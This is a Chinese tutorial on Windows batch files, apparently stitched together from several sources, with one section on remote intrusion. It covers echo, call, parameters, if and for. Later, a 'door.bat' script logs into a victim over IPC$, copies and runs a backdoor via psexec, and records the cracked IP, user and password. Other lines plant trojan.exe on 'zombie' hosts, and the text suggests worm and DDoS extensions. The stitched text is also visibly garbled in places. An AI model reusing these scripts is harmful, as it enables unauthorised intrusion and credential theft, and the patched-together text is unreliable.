bat文件可直接鼠标双击运行。
bat是dos下的批处理文件,批处理文件是无格式的文本文件,它包含一条或多条命令。
它的文件扩展名为.bat或.cmd,在命令提示下键入批处理文件的名称,或者双击该批处理文件,系统就会调用Cmd.exe按照该文件中各个命令出现的顺序来逐个运行它们。
扩展资料:
批处理文件(batchfile)包含一系列DOS命令,通常用于自动执行重复性任务。用户只需双击批处理文件便可执行任务,而无需重复输入相同指令。编写批处理文件非常简单,但难点在于确保一切按顺序执行。
编写严谨的批处理文件可以极大程度地节省时间,在应对重复性工作时尤其有效,在Windows中善用批处理可以简化很多重复工作。
批处理(Batch),也称为批处理脚本。顾名思义,批处理就是对某对象进行批量的处理。批处理文件的扩展名为bat。DOS批处理则是基于DOS命令的,用来自动地批量地执行DOS命令以实现特定 *** 作的脚本。
系统在解释运行批处理程序时,首先扫描整个批处理程序,然后从第一行代码开始向下逐句执行所有的命令,直至程序结尾或遇见exit命令或出错意外退出。
参考资料来源:百度百科-bat文件
批处理语法:先讲个最基本的东西 @echo off
echo的意思是回旋,这里的意思就是回显,echo off意思就是关闭回显.前面的@表示echo off 这一行也不会回显你可以试着去掉@和整行去掉.@的另一个功能是在执行完批处理文件时自动恢复命令回显。如果第一句用的是ECHO OFF,那么在执行完批处理文件以后不会显示命令提示符。
举个例子:如果我们先创建一个1.bat文件,往里面输入:
dir 然后保存在c:\下.然后我们运行cmd,进入c盘根目录下,输入1.bat,则显示:
C:>dir
驱动器 C 中的卷没有标签。
卷的序列号是 0C5D-07FF
C: 的目录
2004-08-25 00:45<DIR> WINDOWS
2004-08-25 00:51<DIR> Documents and Settings
...........
C:
如果将1.bat内容修改成
echo off
dir
然后再在cmd里输入1.bat,则会显示
C:>echo off //因为运行了echo off,所以没有显示dir命令,直接显示了结果
驱动器 C 中的卷没有标签。
卷的序列号是 0C5D-07FF
C: 的目录
2004-08-25 00:45<DIR> WINDOWS
2004-08-25 00:51<DIR> Documents and Settings
.....
C:
如果将1.bat文件修改成:
@echo off
dir
则显示成:
C:>1.bat //与前面不同,并没有显示echo off,原因是加了@,所以不显示@后面的内容.又因为加
//了echo off,所以后面的命令不显示,直接显示结果
驱动器 C 中的卷没有标签。
卷的序列号是 0C5D-07FF
C: 的目录
2004-08-25 00:45<DIR> WINDOWS
2004-08-25 00:51<DIR> Documents and Settings
....
C:
通过以上的比较,相信你对echo off命令已经充分掌握了.现在已经1点了...写得累啊!!!洗澡睡觉去了
----------------------
早晨6点就被拉起来了...我命苦啊,那么继续写吧
----------------------
接下来讲的是call命令:
call 是打电话的call,而不是”喔靠”的靠:).call的意思为调用.假如有2个批处理文件a.bat和b.bat.如果我想运行a.bat的当中运行 b.bat.如何运行呢?其实很简单,只要在a.bat文件中输入call命令,则可以在a.bat运行的当中,运行b.bat,等b.bat运行完之后,继续执行a.bat
call命令格式:
CALL [drive:][path]filename [batch-parameters]
batch-parameters 指定批处理程序所需的命令行信息。
举例如下,我们在c盘根目录下创建a.bat文件,内容为:
echo this is a.bat
call d:b.bat
echo done
然后在d盘根目录下创建b.bat,内容为:
echo this is b.bat
保存后,打开cmd,进入c盘根目录,然后输入1.bat,显示如下:
C:>a.bat
C:>echo this is a.bat
this is a.bat
C:>call d:b.bat
C:>echo this is b.bat
this is b.bat
C:>echo done
done
由例子很容易看出来,是先运行a.bat的内容,直到遇到call b.bat后,则调用b.bat,运行完b.bat后,再返回a.bat接着运行call b.bat后面的echo done语句,直至将a.bat的所有批处理命令运行完.
注:里面有个[batch-parameters]里面的所指的参数是什么,知道的朋友能否告知,不胜感激.
PAUSE 命令
暂停批处理程序的执行并显示一条消息,提示用户按任意键继续执行。只能在批处理程序中使用该命令。
rem命令:
表示此命令后的字符为解释行(注释),不执行,只是给自己今后参考用的(相当于程序中的注释).
同时你可以用两个冒号来替代rem.如: ::等同于一个rem.但他们有个区别,就是用::作注释的话他是不回显的,即使你打echo on强制回显也没有同的.同时rem可以在config.sys中加注释.
语法: rem[commnet]
批处理文件参数:
有点变成基础的人都知道函数有参数.批处理文件也有参数.
我打个比方,希望能帮助没有语言基础的人也能看的非常明白.
我从例子里开始吧.首先在c盘根目录下创建一个批处理文件 a.bat,里面输入内容
echo %1
然后打开cmd,然后进入c盘根目录.输入:a "this is a canshu"
得到结果如下:
C:>a.bat "this is a test"
C:>echo "this is a test"
"this is a test"
输入的a "this is a canshu"中,a为新建的a.bat的文件名a(后面的.bat可写也可不写),而a后面的 "this is a canshu"这句话就是参数,写在这的参数,在程序运行中就将参数自动放到批处理程序中去.那么放在什么位置呢?就是放在 %1的地方.
看了例子,让我们看看整个关于参数的定义如何:
批处理文件还可以像C语言的函数一样使用参数(相当于DOS命令的命令行参数),这需要用到一个参数表示符"%"。
%[1-9]表示参数,参数是指在运行批处理文件时在文件名后加的以空格(或者Tab)分隔的字符串。变量可以从%0到%9,%0表示批处理命令本身,其它参数字符串用%1到%9顺序表示。//我们上个程序的例子里就有%1,他就是参数,而输入中”this is a test”作为参数就直接放到%1的位置,于是程序就变成了 echo "this is a test".
再举几个例子帮助你理解:
C:根目录下一批处理文件名为b.bat,内容为:
@echo off
type %1 //type为dos中的输出命令,可以用来输出文本文件的内容,比如我们新建一个1.txt文件
//里面输入内容,保存.进cmd,如果输入1.txt则看不了1.txt文件内容,但是如果我
//想看怎么办呢?这时候可以用type命令,只要在cmd里输入type 1.txt就能显示
//1.txt文件中的内容了
type %2
那么运行C:>b a.txt b.txt
%1 : 表示a.txt
%2 : 表示b.txt
于是上面的批处理命令就变成了
@echo off
type a.txt
type b.txt
于是上面的命令将顺序地显示a.txt和b.txt文件的内容。
没有编程基础的人可能要问,干什么要弄个参数啊?在后面加个参数多麻烦啊?直接往里面写不就好了啊?!其实这样想有对的方面也有错的方面.还是举个例子说明吧.
第一步还是在c盘根目录下新建一个批处理文件,我们取名仍为a.bat.往里面的内容输入为:
ping %1 //ping命令可以简单理解为测试一台机器开着还是没有开,如果开着的话,他就回给你回送回应.
然后进cmd,我们想测试下163的服务器是不是开着,则输入a www.163.com
对于知道ping命令的人,可以打ping进行检查,但如果想ping的人不知道ping命令怎么用,那怎么办啊?这时候你就可以把命令预先输入到批处理文件中,保存好,然后让不会用的人进cmd,运行你的批处理文件,文件名后面加上他要ping 的网站地址就行了.换句话说,他想ping 163就直接加163的网址,想ping sina就直接加sina的网址.这样只要输入一个参数,而不用改程序本身,整个程序的通用性就大大提高了.
这是对于一个简单的ping命令,你或许觉得用参数不值得,还是直接改不就好了啊.但如果程序有很多条,你一下找不到在哪改怎么办啊?所以,不管你是菜哥,菜弟,菜姐,菜妹,只要运行下,输入参数,结果自己就会出来,不用再象你一样,考虑怎么编写批处理文件.人家只要知道是输入什么东西能让批处理程序运行,而编写的人则想的是如何让不懂程序的人能运行程序.
批处理参数就这么简单,不知道你理解了没有?但如果你想深一步了解批处理参数,可以接着往下看,如果不想深入了解,知道现在这么多也就够了.
以下粉红色内容为网上资料.
====================================
因为参数只有1%-9%,但当我们要引用第十个或更多个参数时, 就必须移动DOS 的参数起始指针. shift 命令正充当了这个移动指针的角色, 它将参数的起始指针移动到下一个参数, 类似C 语言中的指针 *** 作. 图示如下:
初始状态, cmd 为命令名, 可以用 %0 引用
cmd arg1 arg2 arg3 arg4 arg5 arg6 arg7 arg8 arg9 arg10
^ ^ ^ ^ ^ ^ ^ ^ ^ ^
&line &line &line &line &line &line &line &line &line &line
%0 %1%2 %3 %4 %5 %6%7 %8 %9
经过1次shift后, cmd 将无法被引用
cmd arg1 arg2 arg3 arg4 arg5 arg6 arg7 arg8 arg9 arg10
^ ^ ^ ^ ^ ^ ^ ^ ^ ^
&line &line &line &line &line &line &line &line &line &line
%0 %1%2 %3 %4 %5 %6%7 %8 %9
经过2次shift后, arg1也被废弃, %9指向为空, 没有引用意义
cmd arg1 arg2 arg3 arg4 arg5 arg6 arg7 arg8 arg9 arg10
^ ^ ^ ^ ^ ^ ^ ^ ^ ^
&line &line &line &line &line &line &line &line &line &line
%0 %1%2 %3 %4 %5 %6%7 %8 %9
遗憾的是, win9x 和DOS下均不支持 shift 的逆 *** 作. 只有在 nt 内核命令行环境下, shift 才支持 /n 参数, 可以以第一参数为基准返复移动起始指针.
=================
if goto choice for高级语法
今天就写到这吧,我收拾收拾东西准备滚蛋回学校了.可能if goto choice for高级语法要在沈阳才能完成了,祝我好运吧.
======================
学校的"网吧"终于算重新开张了,抓紧时间把剩下的写完
if命令
说得通俗点,if就相当于我们白话里的如果.
举个例子:如果a喜欢b,那么a就要娶b. 这句话翻译成计算机语言就成了
if a喜欢b a就要娶b.
当然拉,计算机不可能理解a喜欢b,a就要娶b这两句话,这里只是举个例子让你方便理解.
if语句一共有3种模式,如下:
IF [NOT] string1==string2 command
IF [NOT] EXIST filename command
IF [NOT] ERRORLEVEL number command
NOT 指定只有条件为 false 的情况下, Windows XP 才应该执行该命令。
ERRORLEVEL number 如果最后运行的程序返回一个等于或大于指定数字的退出编码,指定条件为 true。
string1==string2 如果指定的文字字符串匹配,指定条件为 true。
EXIST filename如果指定的文件名存在,指定条件为 true。
command 如果符合条件,指定要执行的命令。如果指定的条件为 FALSE,命令后可跟一个执行 ELSE关键字后的命令的 ELSE 命令。
我们先讲解第一种:
IF [NOT] string1==string2 command
自然语句意思:如果string1==string2,那么执行command
下面再举个能实际应用的if语句.
自然语句:如果输入的参数为3,那么显示”a=3”
计算机语句:
@echo off
if "%1"=="3" echo "a=3"
或者写成
@echo off
if %1==3 echo "a=3"
注意:当要测试的时候,因在cmd底下,输入1.bat 3.因为这里用了是传递参数,具体看文章前部分"批处理文件参数".
第二种:
IF [NOT] EXIST filename command
这条命令用语检测文件是否存在.如果存在,执行command.如果不存在,则什么也不显示.
如:我们想检查e盘根目录下是否有一个叫2.txt的文件.如果存在,则显示exist.如果不存在,则什么也不显示.
批处理命令如下:
@echo off
if exist e:2.txt echo "exist 2.txt"
第三种:
IF [NOT] ERRORLEVEL number command
这个我引用点资料,感觉别人写得更详细,引用部分为粉色字部分:
if errorlevel <数字>待执行的命令
很多DOS程序在运行结束后会返回一个数字值用来表示程序运行的结果(或者状态),通过if errorlevel命令可以判断程序的返回值,根据不同的返回值来决定执行不同的命令(返回值必须按照从大到小的顺序排列)。如果返回值等于指定的数字,则条件成立,运行命令,否则运行下一句。
如if errorlevel 2 goto x2
==== 注 ===========
返回值从大到小的顺序排列不是必须的, 而只是执行命令为 goto 时的习惯用法, 当使用 set 作为执行命令时, 通常会从小到大顺序排列, 比如需将返回码置入环境变量, 就需使用以下的顺序形式:
if errorlevel 1 set el=1
if errorlevel 2 set el=2
if errorlevel 3 set el=3
if errorlevel 4 set el=4
if errorlevel 5 set el=5
...
当然, 也可以使用以下循环来替代, 原理是一致的:
for %%e in (1 2 3 4 5 6 7 8...) do if errorlevel %%e set el=%%e //此处为一个for循环,后面会继续介绍到的,看不懂可以先跳过去
if errorlevel 比较返回码的判断条件并非等于, 而是大于等于. 由于 goto 的跳转特性, 由小到大排序会导致在较小的返回码处就跳出而由于 set命令的 "重复" 赋值特性, 由大到小排序会导致较小的返回码 "覆盖" 较大的返回码.
另外, 虽然 if errorlevel=<数字>command 也是有效的命令行, 但也只是 command.com 解释命令行时将 = 作为命令行切分符而忽略掉罢了
choice命令
????
goto命令
for命令
for命令其实就是一个循环命令,如果我们想重复一个语句,就可以用for命令.通过for命令,可以控制循环的次数等.
语法:
FOR %variable IN (set) DO command [command-parameters]
%variable 指定一个单一字母可替换的参数。
(set) 指定一个或一组文件。可以使用通配符。
command指定对每个文件执行的命令。
command-parameters
为特定命令指定参数或命令行开关。
在批处理文件中使用 FOR 命令时,指定变量请使用 %%variable
而不要用 %variable。变量名称是区分大小写的,所以 %i 不同于 %I.
不知道你你看懂了没有,其实还是很容易理解的,还是举个例子吧.我想用type打印所有c盘根目录下的bat文件和txt文件.dos底下命令就是 type *.bat *.txt.先将该文件保存在c盘根目录下,名称为a.bat
用for命令如下:
for %%t in (*.bat *.txt) do type %%t
%%t其实就是代表的一个参数,他的内容在in() 里面括号里的内容.也就是说这句话里的%%t就变成了*.bat *.txt了.do就是做的意思,执行type命令,而type后面是%%t,而%%t又是*.bat *.txt.所以原来这句命令的意思就变成了:
type *.bat *.txt
执行时进cmd,然后到c盘根目录下输入a.bat就可以打印出c盘根目录下所有扩展名为.bat和.txt的文件内容了.
这里要注意:in后面有个空格.
在xp底下,for命令扩展名被起用因此for的功能变得更加强大.下面讲一个真正的循环.
FOR /L %variable IN (start,step,end) DO command [command-parameters]
该集表示以增量形式从开始到结束的一个数字序列。
因此,(1,1,5) 将产生序列 1 2 3 4 5,(5,-1,1) 将产生
序列 (5 4 3 2 1)
里面第一个1在start的位置,意思是起始位置,第2个1在step位置,英文意思是跨步,在这里面的意思是每次增量为1.后面的5在end的位置,意思是结束时的大小.
这句话的意思就是从1(start)开始增加,每次增加1(step),一直到变到5(end)为止.
这个有什么用呢?其实我感觉这个东西的用处还是很大的.举个最简单的例子,我们想重复回显"i am the best"这句话,重复显示10遍.那么for命令如下:
for /L %%e in (1,1,10) do echo "i am the best"
这时,cmd就会重复输入"i am the best"10遍.
===============================================
看完整篇文章了吗?咳...我写的不容易啊....
现在不知道你对bat有了什么样的理解,我现在的感觉就是bat就是dos命令的组合,你把dos命令全写进bat命令,只要运行下bat就会挨个执行dos命令,这无疑提供了不少的方便。
下面我再举些实例.
删除默认共享:
对于默认共享不知道你了解多少,反正留着是个隐患,现在唯一的办法好象只能做个bat文件进行删除.命令如下:
net share ipc$Content$nbsp/delete
net share admin$Content$nbsp/delete
net share c$Content$nbsp/delete
net share d$Content$nbsp/delete
net share e$Content$nbsp/delete
……
里面的c d e为你的盘符。如果你只有一个分区,那么写到net share c$Content$nbsp/delete为止就可以了。如果你有n个分区,那么就挨个写下去。
net share d$Content$nbsp/delete
net share e$Content$nbsp/delete
net share f$Content$nbsp/delete
net share g$Content$nbsp/delete……
登陆到内网的机器快捷方式(对方机器有密码且为2000或以上系统)
net use \192.168.0.1 [密码] /user:[用户名]
explorer \192.168.0.1
bat文件备份注册表
set regfile=%date% //设置变量,下面出现%regfile%的都自动替换“当天date”
if exist "%regfile%" goto end //如果发现当天date命名的目录,跳到文件尾。
md temp //建temp目录
call 1.bat //调用1.bat
del 1.bat
ren 2.bat 1.bat
ren 3.bat 2.bat
ren 4.bat 3.bat
echo move "%regfile%" temp >4.bat //写 移动“当天date命名的目录”到temp的bat文件 。
md "%regfile%" //建当天date命名的目录
cd "%regfile%" //进入
reg export hkcu hkcu.reg //导出注册表
reg export hklm hklm.reg
//HKEY_CURRENT_USER 缩写hkcu 。存放当前用户个人数据
//HKEY_LOCAL_MACHINE 缩写hklm 。系统的核心数据
cd..
deltree /y temp >nul////返回上级目录 ,删temp文件夹
:end
--------------- cut here then save as a batchfile(I call it main.bat ) ---------------------------
------------------- cut here then save as a batchfile(I call it door.bat) -----------------------------
@net use \\%1\ipc$ %3 /u:"%2"
@if errorlevel 1 goto failed
@echo Trying to establish the IPC$ connection …………OK
@copy windrv32.exe\\%1\admin$\system32 &&if not errorlevel 1 echo IP %1 USER %2 PWD %3 >>ko.txt
@psexec \\%1 c:\winnt\system32\windrv32.exe
@psexec \\%1 net start windrv32 &&if not errorlevel 1 echo %1 Backdoored >>ko.txt
:failed
@echo Sorry can not connected to the victim.
----------------- cut here then save as a batchfile(I call it door.bat) --------------------------------
这只是一个自动种植后门批处理的雏形,两个批处理和后门程序(Windrv32.exe),PSexec.exe需放在统一目录下.批处理内容
尚可扩展,例如:加入清除日志+DDOS的功能,加入定时添加用户的功能,更深入一点可以使之具备自动传播功能(蠕虫).此处不多做叙述,有兴趣的朋友可自行研究.
No.2
二.如何在批处理文件中使用参数
批处理中可以使用参数,一般从1%到 9%这九个,当有多个参数时需要用shift来移动,这种情况并不多见,我们就不考虑它了。
sample1:fomat.bat
@echo off
if "%1"=="a" format a:
:format
@format a:/q/u/auotset
@echo please insert another disk to driver A.
@pause
@goto fomat
这个例子用于连续地格式化几张软盘,所以用的时候需在dos窗口输入fomat.bat a,呵呵,好像有点画蛇添足了~^_^
sample2:
当我们要建立一个IPC$连接地时候总要输入一大串命令,弄不好就打错了,所以我们不如把一些固定命令写入一个批处理,把肉鸡地ip password username 当着参数来赋给这个批处理,这样就不用每次都打命令了。
@echo off
@net use \\1%\ipc$ "2%" /u:"3%" 注意哦,这里PASSWORD是第二个参数。
@if errorlevel 1 echo connection failed
怎么样,使用参数还是比较简单的吧?你这么帅一定学会了^_^.No.3
三.如何使用组合命令(Compound Command)
1.&
Usage:第一条命令 &第二条命令 [&第三条命令...]
用这种方法可以同时执行多条命令,而不管命令是否执行成功
Sample:
C:\>dir z: &dir c:\Ex4rch
The system cannot find the path specified.
Volume in drive C has no label.
Volume Serial Number is 0078-59FB
Directory of c:\Ex4rch
2002-05-14 23:51
.
2002-05-14 23:51
..
2002-05-14 23:51 14 sometips.gif
2.&&
Usage:第一条命令 &&第二条命令 [&&第三条命令...]
用这种方法可以同时执行多条命令,当碰到执行出错的命令后将不执行后面的命令,如果一直没有出错则一直执行完所有命令;
Sample:
C:\>dir z: &&dir c:\Ex4rch
The system cannot find the path specified.
C:\>dir c:\Ex4rch &&dir z:
Volume in drive C has no label.
Volume Serial Number is 0078-59FB
Directory of c:\Ex4rch
2002-05-14 23:55
.
2002-05-14 23:55
..
2002-05-14 23:55 14 sometips.gif
1 File(s) 14 bytes
2 Dir(s) 768,671,744 bytes free
The system cannot find the path specified.
在做备份的时候可能会用到这种命令会比较简单,如:
dir file://192.168.0.1/database/backup.mdb &&copy file://192.168.0.1/database/backup.mdb E:\backup
如果远程服务器上存在backup.mdb文件,就执行copy命令,若不存在该文件则不执行copy命令。这种用法可以替换IF exist了 :)
3.||
Usage:第一条命令 || 第二条命令 [|| 第三条命令...]
用这种方法可以同时执行多条命令,当碰到执行正确的命令后将不执行后面的命令,如果没有出现正确的命令则一直执行完所有命令;
Sample:
C:\Ex4rch>dir sometips.gif || del sometips.gif
Volume in drive C has no label.
Volume Serial Number is 0078-59FB
Directory of C:\Ex4rch
2002-05-14 23:55 14 sometips.gif
1 File(s) 14 bytes
0 Dir(s) 768,696,320 bytes free
组合命令使用的例子:
sample:
@copy trojan.exe \\%1\admin$\system32 &&if not errorlevel 1 echo IP %1 USER %2 PASS %3 >>victim.txt
在批处理文本顶部先加入如下语句,就可以实现直接以管理员身份运行,如下:
@echo off
>nul 2>&1 "%SYSTEMROOT%\system32\cacls.exe"
"%SYSTEMROOT%\system32\config\system"
if '%errorlevel%' NEQ '0' (
goto UACPrompt
) else ( goto gotAdmin )
:UACPrompt
echo Set UAC = CreateObject^("Shell.Application"^) >"%temp%\getadmin.vbs"
echo UAC.ShellExecute "%~s0", "", "", "runas", 1 >>"%temp%\getadmin.vbs"
"%temp%\getadmin.vbs"
exit /B
:gotAdmin
if exist "%temp%\getadmin.vbs" ( del "%temp%\getadmin.vbs" )
扩展资料:
1、批处理文件的扩展名为bat ,目前比较常见的批处理包含两类:DOS批处理和PS批处理。PS批处理基于强大的图片编辑软件Photoshop,用来批量处理图片的脚本。而DOS批处理则基于DOS命令的,用来自动地批量地执行DOS命令以实现特定 *** 作的脚本。
2、在复杂的情况,需要使用if、for、goto等命令控制程式的运行过程,如同C、Basic等高级语言一样。若实现更复杂的应用,则必须利用到外部程式,这包括系统本身提供的外部命令和第三方提供的工具或者软件。批处理程序虽然是在命令行环境中运行,但不仅仅能使用命令行软件,任何当前系统下可运行的程序都可以放在批处理文件中运行。
欢迎分享,转载请注明来源:内存溢出
评论列表(0条)